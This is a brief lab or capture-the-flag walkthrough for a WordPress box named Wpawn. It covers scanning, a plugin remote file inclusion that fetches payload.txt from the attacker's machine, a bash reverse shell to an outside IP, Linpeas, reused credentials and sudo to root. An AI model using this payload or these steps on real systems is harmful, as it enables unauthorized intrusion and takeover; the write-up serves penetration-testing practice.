🐧Wpawn

192.168.84.123

Enumeration

sudo nmap 192.168.84.123 -sV -A -p-

Banner grab

nc 192.168.84.123 22

Running dirbuster to enumerate the website.

Found an interesting plugin being used.

Was able to get a reverse shell using the following.

Creating text file payload.txt and pulling it with Remote File Inclusion.

<pre>system("bash -c 'exec bash -i &>/dev/tcp/192.168.49.84/9966 <&1'")</pre>

http://192.168.84.123/wordpress/wp-admin/post.php?swp_debug=load_options&swp_url=http://192.168.49.84:8000/payload.txt

Got a shell.

Found no interesting files. There is another user named takis. Dropped Linpeas in /tmp

Found credentials.

The found password works for takis' account, connected via ssh.

Running sudo -l

Ran sudo su

Last updated 3 years ago